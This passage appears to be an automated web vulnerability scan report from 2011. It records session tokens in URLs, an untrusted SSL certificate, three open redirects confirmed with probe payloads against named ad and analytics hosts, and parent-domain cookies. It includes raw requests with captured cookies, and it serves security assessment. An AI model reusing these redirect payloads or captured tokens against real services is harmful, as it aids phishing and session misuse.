GET /pview?event=pview&publisher=b1d8748b-b62f-4386-8fe9-64214c4421aa&hostname=thesouthern.com&location=%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&url=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&sessionID=1307962879794.34627&fpc=9fc39ed-13088a9af36-7127350f-1&ts1307962967810.0&r_sessionID=&hash_flag=&shr=&count=1 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Mon, 13 Jun 2011 11:02:53 GMT
Connection: keep-alive

9.2. http://www.apture.com/js/apture.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.apture.com
Path:	/js/apture.js

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.apture.com/js/apture.js?siteToken=P5fUrvb&ver=wpcom

Request

GET /js/apture.js?siteToken=P5fUrvb&ver=wpcom HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=s4te21hWKP

Response

9.3. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=249141081161&app_id=249141081161&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfbccadb24%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff39bc43f7c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df23f554704%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff39bc43f7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1284845f8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfea25cac%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff39bc43f7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1284845f8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa6c4e4ac%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff39bc43f7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1284845f8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2aea701c4%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff39bc43f7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1284845f8&sdk=joey&session_origin=1&session_version=3

Request

GET /extern/login_status.php?api_key=249141081161&app_id=249141081161&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfbccadb24%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff39bc43f7c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df23f554704%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff39bc43f7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1284845f8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfea25cac%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff39bc43f7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1284845f8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa6c4e4ac%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff39bc43f7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1284845f8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2aea701c4%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff39bc43f7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1284845f8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.205.47
X-Cnection: close
Date: Mon, 13 Jun 2011 11:01:43 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

9.4. http://www.google.com/recaptcha/api/challenge previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.google.com
Path:	/recaptcha/api/challenge

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.google.com/recaptcha/api/challenge?k=6LezHAAAAAAAADqVjseQ3ctG3ocfQs2Elo1FTa_a&ajax=1&xcachestop=0.33631236967630684&authp=nonce.tt.time.new_audio_default&psig=XPMeZ8EGKsul6AsQe4iPD7el-pY&nonce=jCV1bPgQ4ZF9NfyLU8655w&tt=j-O9mWspUEb2uCXcYkeryBsqTO4&time=1307963525&new_audio_default=1

Request

GET /recaptcha/api/challenge?k=6LezHAAAAAAAADqVjseQ3ctG3ocfQs2Elo1FTa_a&ajax=1&xcachestop=0.33631236967630684&authp=nonce.tt.time.new_audio_default&psig=XPMeZ8EGKsul6AsQe4iPD7el-pY&nonce=jCV1bPgQ4ZF9NfyLU8655w&tt=j-O9mWspUEb2uCXcYkeryBsqTO4&time=1307963525&new_audio_default=1 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=129912307028545&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df638c2e28%26origin%3Dhttp%253A%252F%252Fwww.mavgear.com%252Ff23692f8a8%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&numposts=10&sdk=joey&title=Spotlight%20Items%20-%20Dallas%20Mavericks%20-%20Basketball%20Fan%20Apparel%20-%20mavgear.com&url=http%3A%2F%2Fwww.mavgear.com%2FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html&width=550&xid=http%253A%252F%252Fwww.mavgear.com%252FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=47=lorCzpeeruyCsbBVsWEMMq0Dn_FEZO2YvQlh5PbRyvyK-EGYzmwzyA_2p0yLU1EIOsGj5P7ltQDj-N2Ero7RzOq6NjJuFZs5xUAH3SXWEGgb9bkdrXqd248wCK5T3lcc

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Mon, 13 Jun 2011 11:12:10 GMT
Content-Type: text/javascript
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 471
Server: GSE

var RecaptchaState = {
site : '6LezHAAAAAAAADqVjseQ3ctG3ocfQs2Elo1FTa_a',
challenge : '03AHJ_VusAKLzBXx65ZnCTm-Xp0UXoIANmcYCcPGpIFV6264Vx50siKKiUPX2s-BF2esQdvG2rmZoH9qGYt000LDCjYlrpaDr_kHvFvB
...[SNIP]...

10. SSL certificate previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://login.yahoo.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	login.yahoo.com
Issued by:	DigiCert High Assurance CA-3
Valid from:	Mon Dec 20 18:00:00 CST 2010
Valid to:	Thu Jan 03 17:59:59 CST 2013

Certificate chain #1

Issued to:	DigiCert High Assurance CA-3
Issued by:	DigiCert High Assurance EV Root CA
Valid from:	Mon Apr 02 19:00:00 CDT 2007
Valid to:	Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:	DigiCert High Assurance EV Root CA
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Jan 13 13:20:32 CST 2010
Valid to:	Wed Sep 30 13:19:47 CDT 2015

Certificate chain #3

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 19:29:00 CDT 1998
Valid to:	Mon Aug 13 18:59:00 CDT 2018

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

11. Open redirection previous next
There are 3 instances of this issue:

http://b.scorecardresearch.com/r [d.c parameter]
http://r.nexac.com/e/getdata.xgi [ru parameter]
http://u.openx.net/w/1.0/sc [r parameter]

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.

11.1. http://b.scorecardresearch.com/r [d.c parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The value of the d.c request parameter is used to perform an HTTP redirect. The payload http%3a//a3171be56e2750c/a%3fgif was submitted in the d.c parameter. This caused a redirection to the following URL:

http://a3171be56e2750c/a?gif

Request

GET /r?c2=6035748&d.c=http%3a//a3171be56e2750c/a%3fgif&d.o=nbag-n-league&d.x=80235257&d.t=page&d.u=http%3A%2F%2Fwww.nba.com%2Fmavericks%2Fplayoffs%2F2011_nba_finals_champions.html&d.r=http%3A%2F%2Fwww.nba.com%2Fmavericks%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nba.com/mavericks/playoffs/2011_nba_finals_champions.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://a3171be56e2750c/a?gif
Date: Mon, 13 Jun 2011 11:12:26 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 12-Jun-2013 11:12:26 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

11.2. http://r.nexac.com/e/getdata.xgi [ru parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://r.nexac.com
Path:	/e/getdata.xgi

Issue detail

The value of the ru request parameter is used to perform an HTTP redirect. The payload http%3a//a571ffef466de89c7/a%3fhttp%3a//d.xp1.ru4.com/meta%3f_o%3d65121%26_t%3ddx%26ssv_duid%3d910903057632460979%26ssv_dx_1%3d<na_da>%26ssv_dx_2%3d<na_mp>%26ssv_dx_3%3d<na_id> was submitted in the ru parameter. This caused a redirection to the following URL:

http://a571ffef466de89c7/a?http://d.xp1.ru4.com/meta?_o=65121&_t=dx&ssv_duid=910903057632460979&ssv_dx_1=&ssv_dx_2=&ssv_dx_3=2011051519270862126421219180

Request

GET /e/getdata.xgi?dt=br&pkey=vrie89u2mpteq&ru=http%3a//a571ffef466de89c7/a%3fhttp%3a//d.xp1.ru4.com/meta%3f_o%3d65121%26_t%3ddx%26ssv_duid%3d910903057632460979%26ssv_dx_1%3d<na_da>%26ssv_dx_2%3d<na_mp>%26ssv_dx_3%3d<na_id> HTTP/1.1
Host: r.nexac.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.dt/dt2;sz=1x1;ord=1234443?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=2011051519270862126421219180; na_ps=3; OAX=rcHW803foR4AB3jk; na_tc=Y

Response

HTTP/1.1 302 Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
X-Powered-By: Jigawatts
Location: http://a571ffef466de89c7/a?http://d.xp1.ru4.com/meta?_o=65121&_t=dx&ssv_duid=910903057632460979&ssv_dx_1=&ssv_dx_2=&ssv_dx_3=2011051519270862126421219180
Content-type: text/html
Date: Mon, 13 Jun 2011 11:14:49 GMT
Server: lighttpd/1.4.18
Content-Length: 1

11.3. http://u.openx.net/w/1.0/sc [r parameter] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://u.openx.net
Path:	/w/1.0/sc

Issue detail

The value of the r request parameter is used to perform an HTTP redirect. The payload http%3a//a7bd0e01e9a38b758/a%3fhttp%3a//ox-d.sbnation.com/w/1.0/ajs%3fo%3d700820584%26auid%3d20336%26tid%3d2,8,17%26res%3d1920x1200x32%26plg%3dswf,sl,shk%26ch%3dUTF-8%26tz%3d300%26c.team%3ddallas-mavericks%26c.entry_type%3dstory%26c.region%3ddallas%26url%3dhttp%253A//www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship%26cb%3d700820584%26cc%3d1 was submitted in the r parameter. This caused a redirection to the following URL:

http://a7bd0e01e9a38b758/a?http://ox-d.sbnation.com/w/1.0/ajs?o=700820584&auid=20336&tid=2,8,17&res=1920x1200x32&plg=swf,sl,shk&ch=UTF-8&tz=300&c.team=dallas-mavericks&c.entry_type=story&c.region=dallas&url=http%3A//www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship&cb=700820584&cc=1&mi=5cb31120-2bcf-44f1-b2a9-32c6ee29a288&mn=0&mc=1

Request

GET /w/1.0/sc?r=http%3a//a7bd0e01e9a38b758/a%3fhttp%3a//ox-d.sbnation.com/w/1.0/ajs%3fo%3d700820584%26auid%3d20336%26tid%3d2,8,17%26res%3d1920x1200x32%26plg%3dswf,sl,shk%26ch%3dUTF-8%26tz%3d300%26c.team%3ddallas-mavericks%26c.entry_type%3dstory%26c.region%3ddallas%26url%3dhttp%253A//www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship%26cb%3d700820584%26cc%3d1 HTTP/1.1
Host: u.openx.net
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1306540055; i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; Version=1; Expires=Tue, 12 Jun 2012 11:08:31 GMT; Max-Age=31536000; Domain=.openx.net; Path=/
Server: MochiWeb/1.1 WebMachine/1.7.2 (participate in the frantic)
P3P: CP="CUR ADM OUR NOR STA NID"
Location: http://a7bd0e01e9a38b758/a?http://ox-d.sbnation.com/w/1.0/ajs?o=700820584&auid=20336&tid=2,8,17&res=1920x1200x32&plg=swf,sl,shk&ch=UTF-8&tz=300&c.team=dallas-mavericks&c.entry_type=story&c.region=dallas&url=http%3A//www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship&cb=700820584&cc=1&mi=5cb31120-2bcf-44f1-b2a9-32c6ee29a288&mn=0&mc=1
Date: Mon, 13 Jun 2011 11:08:31 GMT
Content-Type: text/html
Content-Length: 0
Connection: close

12. Cookie scoped to parent domain previous next
There are 168 instances of this issue:

http://api.twitter.com/1/FanSided/lists//statuses.json
http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information
http://www.tripadvisor.com/img/cdsi/img2/ratings/partner/e4.0-13878-5.gif
http://a.tribalfusion.com/i.cid
http://a.tribalfusion.com/j.ad
http://ad.afy11.net/ad
http://ad.amgdgt.com/ads/
http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUFng8aJLBZKJyWoaUyNqjOVxerAdnZW8sdXNhLHQsMTMwNzk2NDAxMjgxMCxjLDM0NTc2OCxwYyw3NzQ4MyxhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk1LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVjdWFkUTg1dE1FcUMuTVg2ZXFWMTU3Y1F2SkpuWlc4c2RYTmhMSFFzTVRNd056azJOREF3T0RFM01TeGpMRE0wTmpRMk55eHdZeXczT1Rjd01DeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVDFRNVQxWjNVRnB3YTB4ZllYbEVSMjkyUW1SNU9XczRkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RsQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZaM2QwSkJaMVZEUVZGUlFVRkJRVUZQVW04eVlVRkJRVUZCUVM0dlkyNWtQU0ZpZDFoTVRGRnFZek5uVVZGNVQyZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmllRVpDV1Y5TU1WUmtla3BQVFhvNGJGRm1TbTFoU0hoRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNlkwTmxkMmhzU25sUGNsZzJOMGxMYVhWUVJGSlJjRFZOV1ZobkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp
http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUcuadQ85tMEqC.MX6eqV157cQvJJnZW8sdXNhLHQsMTMwNzk2NDAwODE3MSxjLDM0NjQ2NyxwYyw3OTcwMCxhYywxNzc5OTEsbyxOMC1TMCxsLDY0MDU0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBQUVBQUFBQUFBQUFBUUFBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRT1Q5T1Z3UFpwa0xfYXlER292QmR5OWs4dlZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCSTlBVUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQVZ3d0JBZ1VDQVFRQUFBQUFPUm8yYUFBQUFBQS4vY25kPSFid1hMTFFqYzNnUVF5T2dYR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJieEZCWV9MMVRkekpPTXo4bFFmSm1hSHhDTmZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTFFEOEFDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREFnQWFHcHFhYnk4VGR4X0VCJm51bT0xJnNpZz1BR2lXcXR6Y0Nld2hsSnlPclg2N0lLaXVQRFJRcDVNWVhnJmNsaWVudD1jYS1wdWItNzQ5NDE1NjAyNzAxODM0MiZhZHVybD0K/clkurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp
http://ad.doubleclick.net/ad/N2949.280881.BUZZMEDIA/B5492484.13
http://ad.doubleclick.net/ad/N5762.1420.TIME.COM1/B5345366.23
http://ad.doubleclick.net/ad/N5776.time.comOX3940/B5358797.2
http://ad.doubleclick.net/ad/N6457.131643.MEEBO/B4840137
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8
http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7
http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3
http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27
http://ad.doubleclick.net/adi/N553.Glam/B5345813.2
http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8
http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7
http://ad.doubleclick.net/adj/N3727.Expedia.com/B5235969.34
http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.10
http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11
http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.7
http://ad.doubleclick.net/adj/N6294.149112.GLAMMEDIA.COM/B5303021.4
http://ad.doubleclick.net/adj/buz.idolator/content
http://ad.doubleclick.net/adj/cm.mtv/ent_010111
http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler
http://ad.doubleclick.net/adj/oiq.rmx/
http://ad.doubleclick.net/click
http://ad.turn.com/server/ads.js
http://ad.turn.com/server/pixel.htm
http://admeld.adnxs.com/usersync
http://admeld.lucidmedia.com/clicksense/admeld/match
http://adopt.imiclk.com/emb/q
http://ads.adbrite.com/adserver/vdi/742697
http://ads.revsci.net/adserver/ako
http://ak1.abmr.net/is/adopt.imiclk.com
http://ak1.abmr.net/is/tag.admeld.com
http://ak1.abmr.net/is/www.burstnet.com
http://altfarm.mediaplex.com/ad/js/12309-129868-23636-1
http://altfarm.mediaplex.com/ad/js/17038-128465-20406-11
http://amch.questionmarket.com/adsc/d724925/2/725047/adscout.php
http://amch.questionmarket.com/adsc/d888315/39/500005401531/decide.php
http://amch.questionmarket.com/adsc/d893515/8/41197792/decide.php
http://api.bizographics.com/v1/profile.redirect
http://apr.lijit.com///www/delivery/ajs.php
http://ar.voicefive.com/b/recruitBeacon.pli
http://ar.voicefive.com/b/recruitBeacon.pli
http://ar.voicefive.com/b/wc_beacon.pli
http://ar.voicefive.com/bmx3/broker.pli
http://at.amgdgt.com/ads/
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://b.scorecardresearch.com/r
http://b.voicefive.com/b
http://b.voicefive.com/p
http://bh.contextweb.com/bh/rtset
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://ce.lijit.com/merge
http://cm.npc-lee.overture.com/js_1_0/
http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4325897289836481830
http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4325897289836481830
http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0
http://d.chango.com/collector/admeldpixel
http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4325897289836481830
http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830
